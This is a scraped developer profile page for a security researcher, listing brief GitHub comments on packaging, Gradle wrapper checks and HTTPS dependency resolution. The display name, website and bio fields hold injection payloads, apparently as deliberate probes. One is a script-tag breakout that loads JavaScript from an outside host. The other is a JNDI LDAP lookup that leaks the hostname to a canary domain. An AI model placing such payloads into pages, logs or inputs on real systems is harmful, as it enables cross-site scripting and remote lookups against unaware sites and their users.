Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

icon indicating a website link ${jndi:ldap://x${hostName}.L4J.lile3fakwhyqg99zgj0yytxz7.canarytokens.com/a} icon indicating an email [email protected]

icon company @chainguard-dev icon location Boston, MA icon location Software Engineer & Security Researcher; First Dan Kaminsky Fellow @ HUMAN Security; ${jndi:ldap://x${hostName}.L4J.lile3fakwhyqg99zgj0yytxz7.canarytoken

Results 594 comments of Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

Add installation instructions

Can we just create a `requirements.txt` file instead? Also, I do recommend using python virtual environments. https://docs.python.org/3/tutorial/venv.html

Add installation instructions

No worries

Add installation instructions

You could probably just suggest using virtual environments, no need to spell it out for people.

Create a definitive list of bug bounty programs and their OSS organizations

Big fan of this idea. I was considering doing something like this in a GitHub collection. https://github.com/collections

Cache project names saved to lgtm

I'd just as soon not prematurely optimize. If it becomes a problem, we should absolutely fix it.

Automatically perform wrapper validation check in `setup-gradle`

I think the biggest thing blocking this from happening is that currently Gradle doesn't publish wrapper SHAs for SNAPSHOT releases. As such, projects like `gradle/gradle` can't use the verification action...

Automatically perform wrapper validation check in `setup-gradle`

@bigdaz this looks like it may be possible now that Gradle publishes snapshot checksums, right?

[SECURITY] Use HTTPS to resolve dependencies in Maven Build

Not for lack of trying

[SECURITY] Use HTTPS to resolve dependencies in Maven Build

Hi! This should still be merged.

[SECURITY] Use HTTPS to resolve dependencies in Maven Build

Not stale. Still here.